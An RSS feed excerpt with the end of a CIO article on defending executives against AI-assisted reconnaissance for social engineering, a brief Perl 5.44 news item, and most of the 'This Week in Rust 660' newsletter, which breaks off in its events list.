<p class="wp-block-paragraph">Family member exposure is a consistent blind spot. An attacker who cannot pressure an executive directly may look for leverage through a spouse, a sibling or a child. Executives rarely consider their family members’ public digital footprint as part of their own security posture. It is.</p>



<h3 class="wp-block-heading">Shape the narrative where reduction isn’t possible</h3>



<p class="wp-block-paragraph">Public company executives, board members with mandatory disclosure obligations and individuals whose public profiles are central to their organizations’ credibility cannot simply go dark.</p>



<p class="wp-block-paragraph">The objective shifts from reduction to shaping in these cases. The goal is to ensure that what AI tools synthesize from the indexed content is professionally bound and does not inadvertently surface high-value pretext material. This is a joint exercise between security and communications, with security defining risk boundaries and communications executing the strategy.</p>



<h3 class="wp-block-heading">Train executives on what their own profile looks like</h3>



<p class="wp-block-paragraph">The most effective single intervention I have seen in executive briefings is also the simplest. Open a browser and query an AI platform on the executive in the room. Let them see the output. The reaction is consistent. They are surprised by the synthesis, uncomfortable with specific details that surface and immediately more engaged with the rest of the conversation than they were before.</p>



<p class="wp-block-paragraph">Abstract threat briefings about social engineering risks rarely land with senior leaders who feel they understand their own security position. Demonstrated evidence of their AI-mediated profile lands every time. As covered in the context of <a href="https://www.cio.com/article/4076479/from-awareness-to-ai-driven-resilience-protecting-identities-data-and-agents.html">executive-targeted attacks</a>, awareness is a prerequisite for the behavior change that makes protection programs effective.</p>



<h3 class="wp-block-heading">Integrate this into the executive protection program</h3>



<p class="wp-block-paragraph">This work belongs alongside endpoint security, credential management and physical protection in a unified executive protection program. When it remains a communications function, it lacks the reporting structure, budget authority and operational discipline that security work requires.</p>



<p class="wp-block-paragraph">Assign an owner with a security mandate. Include AI exposure in the risk register. Report on it at the same cadence as other executive protection metrics. The organizations that have done this well have not created a separate program for it. They have extended an existing one.</p>



<h2 class="wp-block-heading"><a></a>What effective executive protection programs now include</h2>



<p class="wp-block-paragraph">The organizations that have integrated AI exposure into their executive protection work share a few characteristics that distinguish them from those still treating it as a communications edge case.</p>



<ul class="wp-block-list">
<li>They treat the executive’s public information footprint as a managed attack surface with a named accountable party. Someone is responsible for it, the same way someone is responsible for endpoint patching or identity governance.</li>



<li>They include AI-assisted reconnaissance as a starting condition in red team exercises. Before any social engineering simulation begins, the red team runs the same queries an attacker would run. The pretext they design is based on what those queries return.</li>



<li>Their executive protection briefings include an AI profile review as a standing agenda point. Physical security considerations, credential exposure and public information risk are reviewed together because they are connected. An attacker who knows an executive’s schedule from their public-facing content can time a credential reset attempt or a vishing call with equal precision.</li>
</ul>



<p class="wp-block-paragraph">The executive I reviewed several years ago had no idea what his AI-indexed profile contained or what it enabled. Most of the executives I work with today are in the same position. By the time you finish reading this, it is likely those queries have already been run on someone in your organization. The question is whether your program is positioned to detect it and respond in time.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Programmiersprache Perl 5.44 führt benannte Funktionsparameter ein]]></title>
<description><![CDATA[Das aktuelle Perl geht einen weiteren Schritt in Richtung moderner Objektorientierung. Außerdem schließt Perl 5.44 drei Sicherheitslücken.]]></description>
<link>https://tsecurity.de/de/3672594/it-nachrichten/programmiersprache-perl-544-fuehrt-benannte-funktionsparameter-ein/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672594/it-nachrichten/programmiersprache-perl-544-fuehrt-benannte-funktionsparameter-ein/</guid>
<pubDate>Thu, 16 Jul 2026 09:18:29 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das aktuelle Perl geht einen weiteren Schritt in Richtung moderner Objektorientierung. Außerdem schließt Perl 5.44 drei Sicherheitslücken.]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 660]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3672376/tools/this-week-in-rust-this-week-in-rust-660/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672376/tools/this-week-in-rust-this-week-in-rust-660/</guid>
<pubDate>Thu, 16 Jul 2026 07:09:13 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/2026/07/09/Rust-1.97.0/">Announcing Rust 1.97.0</a></li>
<li><a href="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/">crates.io: development update</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://bun.com/blog/bun-in-rust">Rewriting Bun in Rust</a></li>
<li><a href="https://bullmq.io/news/260712/rust-release/">Announcing BullMQ for Rust</a></li>
<li><a href="https://github.com/zs-dima/prost-protovalidate/releases/tag/v0.6.0">prost-protovalidate 0.6 — buf.validate (protovalidate) for prost and buffa: compile-time codegen + runtime CEL, 2872/2872 conformance</a></li>
<li><a href="https://github.com/StaszeKrk/plaza/releases/tag/v1.0.0">plaza 1.0: a ratatui package-manager TUI that searches pacman, the AUR, apt, dnf, and Flatpak at once</a></li>
<li><a href="https://github.com/danube-messaging/danube/releases/tag/v0.15.1">Danube v0.15.1: native Apache Iceberg integration for streaming-to-lakehouse export</a></li>
<li><a href="https://www.willsearch.com.br/sentinel/">Guardian Sentinel. The Terminal User Interface for Guardian Decentralized Database - P2P</a></li>
<li><a href="https://github.com/kunobi-ninja/kobe/releases/tag/v0.33.0">kobe 0.33.0: a Rust operator for instant CI Kubernetes clusters</a></li>
<li><a href="https://navigatorbuilds.github.io/elara-mesh/blog/black-box-for-ai-agents.html">Elara Mesh: what the black box for AI agents actually does</a></li>
<li>
<p><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.10.0">kache 0.10.0: instant download dedup, no more polling</a></p>
</li>
<li>
<p><a href="https://richer-richard.github.io/cochlea/">cochlea 0.1.0: a headless, deterministic audio engine for AI agents</a></p>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://opensourcesecurity.io/2026/2026-07-rfmf-lori-niko/">Open Source Security Podcast: Rust Foundation Maintainers Fund with Lori and Niko</a></li>
<li><a href="https://pulsebeam.dev/blog/moving-to-thread-per-core">Moving a Rust WebRTC SFU to thread-per-core</a></li>
<li><a href="https://abundance.build/blog/2026-07-11-faster-rust-tests-in-ci-with-parallel-steps/">Faster Rust tests in CI with parallel steps</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=fugcSHD-9Jw">The Only Diagram You Need to Understand Rust Ownership</a></li>
<li><a href="https://encore.dev/blog/typescript-parser-wasm">We compiled our TypeScript parser to WASM</a></li>
<li><a href="https://kerkour.com/rust-hype">Understanding the Rust hype for the busy developer</a></li>
<li><a href="https://dev.to/akavlabs_69/i-red-teamed-my-own-llm-security-gateway-in-four-passes-heres-every-gap-i-found-5cl9">I red-teamed my own LLM security gateway (Rust) in four passes — every detection gap and how I closed it</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li>[video] <a href="https://www.youtube.com/watch?v=DJhhy6YQe8k">Backend Concepts in Rust: HTTP Servers</a></li>
<li><a href="https://dystroy.org/blog/picamobile/">Fearless Embedded Rust: A FPV Lego car</a></li>
<li><a href="https://www.aravpanwar.com/writing/building-decayfmt-in-rust/">What I learned building a self-corrupting file format in Rust</a></li>
<li><a href="https://corentin-core.github.io/posts/ruxe-async-runtime-agnostic/">Come Async You Are</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#miscellaneous">Miscellaneous</a></h5>
<ul>
<li><a href="https://blog.theembeddedrustacean.com/oxidize-xiao">Oxidize XIAO — An Embedded Rust Community Program</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://crates.io/crates/dashu">dashu</a>, a pure Rust set of libraries of arbitrary precision numbers.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1628">JacobZ</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>



<ul>
<li><a href="https://github.com/supernovae-st/nika/issues/424">Nika - showcase: CSV → chart PNG → markdown report (nika:chart has no example yet)</a></li>
</ul>


<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>550 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-07-07..2026-07-14">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158931">inline some <code>Symbol</code> functions</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157104">predicate/clause cleanups</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158942">remove some AST <code>tokens</code> fields</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159019">resolver: wrap arenas in <code>WorkerLocal</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158794">rework read deduplication with pooled read recorders</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159012">shrink <code>mir::Statement</code> to 40 bytes</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157491">shrink no-op drop elaboration</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158865">specialize common <code>(1, 1)</code> case for arg unification</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158842">use SmallVec for return places in MIR</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158866">add explicit <code>Iterator::count</code> impl for <code>ChunkBy</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157153">allow <code>Allocator</code>s to be used as <code>#[global_allocator]</code>s</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158876">fix multiple logic bugs in <code>Arc::make_mut</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158940">implement feature <code>char_to_u32</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159092">make volatile operations const</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158541">move <code>std::io::Write</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159099">stabilize <code>String::from_utf8_lossy_owned</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/151379">stabilize <code>VecDeque::retain_back</code> from <code>truncate_front</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17199"><code>install</code>: Move --debug to Compilation options</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17204"><code>source</code>: incorrect duplicate package warning</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17202">fix manifest schema generation: <code>TomlDebugInfo</code> enum-variants doesn't renamed</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17198">dont apply host-config gating to stable behavior</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17191">reduce library search path length in new build dir layout</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17168">reduce rustc <code>-L</code> args used in the new <code>build-dir</code> layout</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17149">rename <code>-Zno-embed-metadata</code> to <code>-Zembed-metadata=no</code></a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17203">test: fix race in <code>cargo_compile_with_invalid_code_in_deps</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/15000">add new lints: <code>rest_pattern_accessible_field</code> and <code>unnecessary_rest_pattern</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16965">new lint: <code>definition_in_module_root</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17343"><code>arbitrary_source_item_ordering</code>: add configurable trait impl item ordering modes</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17387"><code>tests_outside_test_module</code>: put code in backticks in the lint message</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17215">count length of the first paragraph by its text</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16980">fix <code>suboptimal_flops</code> false negative with ambiguous float literals</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17416">partly disable <code>unneeded_wildcard_pattern</code> when <code>rest_pattern_accessible_field</code> is enabled</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17404">respect the configured MSRV in <code>implicit_saturating_sub</code>'s <code>if x != 0 { x -= 1 }</code> rewrite</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16513">trigger <code>single_element_loop</code> if the block contains only a final expression</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16808">optimize <code>nonstandard_macro_braces</code> by 99.9683% (1.1b → 351K)</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17381">perf: bail out of the <code>disallowed_methods</code> rule if the disallowed list is empty</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22771">ask for disclosure in AI contributions</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22734">add fixes for array length for <code>type_mismatch</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22741">add parens in transformed dyn type in ref type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22736">avoid panic in merge imports on trailing path separator</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22654">change some things for <code>#[doc = macro!()]</code> expansion</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22770">clamp cttz const-eval result to type width</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22751">correctly handled cfg'ed tail expr, take 2</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22749">crash on code actions when an unresolved module is present</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22707">crash when computing diagnostics with MIR and error types</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22744">don't complete default in default impl</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22283">early late classification of lifetimes</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22583">fix <code>render_const_using_debug_impl</code> constructing outdated std layouts</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22735">fix proc macros <code>TokenStream::from_str()</code> for doc comments</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22464">hide private fields on hover depending on context</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22753">make lsp-server <code>Response</code> type closer aligned to JSON-RPC</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22535">pretty assoc const when trait in macro</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22747">reimplement <code>crate_supports_no_std</code> syntactic heuristic</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22773">resolve non-plain paths in blocks correctly</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22683">support Cargo 1.97.0 lockfile path setting</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22405">hir-ty: walk container exprs for <code>unused_must_use</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22768">fix onEnter erroneously deleting/interpreting <code>$foo</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22726">suggest code action fixes produced from diagnostics under cursor, even if they have effects elsewhere</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22777">treat library files as truly client immutable</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22534">turn <code>BlockLoc</code> into a tracked struct, take 3</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>This week many new optimizations landed, making this a very good week for performance.
The only real regression was a fix for a miscompile that will likely be re-landed in the future.</p>
<p>Triage done by <strong>@JonathanBrouwer</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=3659db0d3e2cd634c766fcda79ed118eca31a9fd&amp;end=5503df87342a73d0c29126a7e08dc9c1255c46ad&amp;absolute=false&amp;stat=instructions%3Au">3659db0d..5503df87</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.3%</td>
<td>[0.2%, 0.4%]</td>
<td>3</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>0.9%</td>
<td>[0.1%, 2.5%]</td>
<td>25</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-1.2%</td>
<td>[-9.9%, -0.2%]</td>
<td>195</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-3.4%</td>
<td>[-92.1%, -0.1%]</td>
<td>174</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-1.2%</td>
<td>[-9.9%, 0.4%]</td>
<td>198</td>
</tr>
</tbody>
</table>
<p>2 Regressions, 10 Improvements, 10 Mixed; 7 of them in rollups
36 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/212da2d63f1edf2ab22293547a99f0fbf8cb68a8/triage/2026/2026-07-13.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3955">Named <code>Fn</code> trait parameters</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/159179">enable <code>unreachable_cfg_select_predicates</code> lint as part of <code>unused</code> lint group</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/156906">Stabilize <code>dyn Allocator</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/146954">Tracking Issue for vec_try_remove</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157226">Partially stabilize <code>box_vec_non_null</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/152761">Never break between empty parens</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1015">Enable <code>-Zpolonius=next</code> on nightly</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1014">Enable <code>-Znext-solver</code> on nightly by default for testing</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1012">Stabilizing the state of the debuginfo test suite</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/922">Optimize <code>repr(Rust)</code> enums by omitting tags in more cases involving uninhabited variants.</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/841">Proposal for Adapt Stack Protector for Rust</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a>,
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>,
<a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3983">bf16 primitive type</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-15 - 2026-08-12 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-15 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/21k797xr"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (Tel Aviv-yafo, IL) | <a href="https://www.meetup.com/rust-tlv/events/">Rust 🦀 TLV</a><ul>
<li><a href="https://www.meetup.com/rust-tlv/events/315676843/"><strong>שיחה חופשית ווירטואלית על ראסט</strong></a></li>
</ul>
</li>
<li>2026-07-21 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/315279653/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-07-22 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/hd8mlw56"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-23 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a><ul>
<li><a href="https://www.meetup.com/hackerdojo/events/315418155/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
</ul>
</li>
<li>2026-07-28 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254777/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
<li>2026-07-29 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/uo5ek1f4"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-07-30 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/312045928/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-08-02 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095294/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-08-04 | Virtual (London, GB) | <a href="https://www.meetup.com/women-in-rust/events/">Women in Rust</a><ul>
